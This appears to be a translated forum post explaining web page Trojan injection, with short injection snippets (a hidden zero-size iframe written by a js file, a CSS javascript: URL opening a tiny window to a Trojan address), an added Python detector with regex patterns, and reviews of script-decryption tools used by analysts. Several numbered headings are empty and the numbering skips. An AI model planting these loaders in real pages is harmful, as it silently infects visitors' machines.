by kongzi
I. The concept of web page Trojan injection (挂马):
Web page Trojan injection means: after obtaining some or all permissions on a website or web server, the attacker inserts malicious code into a web page file. The malicious code is mainly exploit code aimed at browsers, including IE. When a user visits the injected page and the system has not installed the patch for the vulnerability that the malicious code exploits, the malicious code is executed, installing Trojan programs and performing other dangerous operations.
II. Common web page Trojan injection methods:
1. Frame (iframe) injection:
2. js file injection:
First, save the following code in a js file:
    document.write("<iframe width=0 height=0 src='Address'></iframe>")
Then reference that file from the page:
    <script language=javascript src=xxx.js></script>
3. js transformation and encryption (obfuscated js):
5. Hidden Trojan injection (the injected content is not displayed):
    body { background-image: url('javascript:document.write("<SCRIPT language=javascript>
        window.open(\'Address\', \'\', \'width=0, height=1\')
    </SCRIPT>")') }
Image disguise: [img]disguised Trojan address[/img], where the file referenced as an image is actually the Trojan page.
1. Judging the vulnerability from the malicious website's name:
2. Judging the vulnerability from the CLSID:
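As an added example that is not part of the original post, the following Python script scans a page for the structural signs of the injection methods listed above (zero-size iframe, remote script include, javascript: URL inside CSS, tiny window.open) and extracts the CLSIDs of embedded ActiveX objects so they can be compared against a list of known-vulnerable controls, which is the CLSID-based judgement just mentioned. The sample page, the example.invalid URLs and the all-zero CLSID are constructed placeholders.

```python
import re

# Constructed sample page (not taken from any real site) that contains the
# injection patterns described in the text. The CLSID is a placeholder.
SAMPLE_HTML = """<html><head><style>
body { background-image: url('javascript:document.write("<script src=http://example.invalid/m.js></script>")') }
</style></head><body>
<iframe src="http://example.invalid/x.htm" width=0 height=0></iframe>
<script language=javascript src=http://example.invalid/xxx.js></script>
<script>window.open("http://example.invalid/p.htm","","width=0,height=1")</script>
<object classid="clsid:00000000-0000-0000-0000-000000000000"></object>
</body></html>"""

# Each rule is (name, regex). The regexes only flag the structural signs of
# injection listed above; a hit still needs manual review of the page.
RULES = [
    ("hidden-iframe", re.compile(r"<iframe[^>]*\b(?:width|height)\s*=\s*['\"]?0\b[^>]*>", re.I)),
    ("remote-script", re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]?https?://[^\s'\">]+", re.I)),
    ("css-javascript-url", re.compile(r"url\(\s*['\"]?\s*javascript:", re.I)),
    ("tiny-window-open", re.compile(r"window\.open\([^)]*\b(?:width|height)\s*=\s*[01]\b", re.I)),
]
CLSID_RE = re.compile(r"classid\s*=\s*['\"]?clsid:([0-9a-f-]{36})", re.I)


def scan_html(html):
    """Return (rule_name, matched_snippet) pairs for every pattern hit.
    A remote script written by the CSS javascript: URL is reported too,
    so nested injections show up as separate findings."""
    findings = []
    for name, rx in RULES:
        for m in rx.finditer(html):
            findings.append((name, m.group(0)[:80]))
    return findings


def extract_clsids(html):
    """Collect the CLSIDs of <object> tags, lower-cased and de-duplicated,
    for lookup against a list of known-vulnerable controls (the classid.ini
    idea used by MDecoder)."""
    return sorted({m.group(1).lower() for m in CLSID_RE.finditer(html)})


if __name__ == "__main__":
    for name, snippet in scan_html(SAMPLE_HTML):
        print(f"[{name}] {snippet}")
    print("CLSIDs found:", extract_clsids(SAMPLE_HTML))
```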
Common web Trojan decryption tools:
1. Freshow (author: jimmyleo)
Tool overview (from the Freshow help document): Freshow is a tool for decrypting scripts. It was developed to reduce mechanical operations and simplify the processing steps, so that you can concentrate on the script itself. Decryption methods generally fall into two kinds, manual and tool-based; Freshow tries to complete as much of the work as possible within one tool, but of course it is not yet fully mature, and you can use it together with other tools to finish the job. Freshow currently has filter and decryption modules that cover the common cryptographic operations needed for analysis. Its effectiveness and the stability of the final result still depend on your familiarity with Freshow, your knowledge and understanding of the script, and your level of analysis.
2. HTMLDecoder (author: Shoko)
Tool description: This automatic decryption tool is very powerful, but unfortunately I am still studying it and have not gone very deep. I have only used it to decrypt pdf and flash web Trojans.
3. Malzilla (the well-known powerhouse tool)
Tool description: This tool is very powerful; web Trojans that Freshow cannot decode can basically all be handled with it.
4. MDecoder (author: 麦田)
Tool profile (taken from 麦田's blog):
1. A Freshow imitator, written in Win32 assembly.
2. Supports locating swf and exe Trojans inside web pages (incomplete).
3. Web Trojan identification can be extended by modifying classid.ini.
That is all for now; there are many more auxiliary tools, which I will introduce to you one by one in follow-up posts.